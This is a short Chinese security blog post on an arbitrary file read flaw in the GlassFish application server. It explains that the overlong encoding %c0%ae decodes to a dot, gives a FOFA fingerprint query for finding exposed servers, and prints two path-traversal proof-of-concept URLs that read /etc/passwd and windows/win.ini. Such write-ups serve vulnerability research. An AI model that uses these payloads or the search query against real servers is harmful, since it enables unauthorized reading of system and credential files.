首页未分类正文

Glassfish任意文件读取漏洞

emer 2023-04-23 00:00 未分类阅读 9.08k 正在检查是否收录

漏洞详情

GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"uC0AE"，最后转义为ASCCII字符的"."。

漏洞复现

fofa：fid="90r39jo6/0uRhK8ILW65Lw=="

POC:

/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

版权所有：多维者博客
文章标题：Glassfish任意文件读取漏洞
除非注明，文章均为多维者博客原创，请勿用于任何商业用途，转载请注明作者和出处多维者博客

收藏

声明：本站所有文章除特别声明外，均采用CC BY-NC-SA 4.0许可协议。转载请注明来自多维者博客！

漏洞复现 || Apache ShenYu Admin plugin 未授权访问

« 上一篇 2023-04-24

Tenda G103 命令注入漏洞 (CVE-2023-27076)

下一篇 » 2023-04-19

相关文章

发表评论

还没有评论，告诉我们你的想法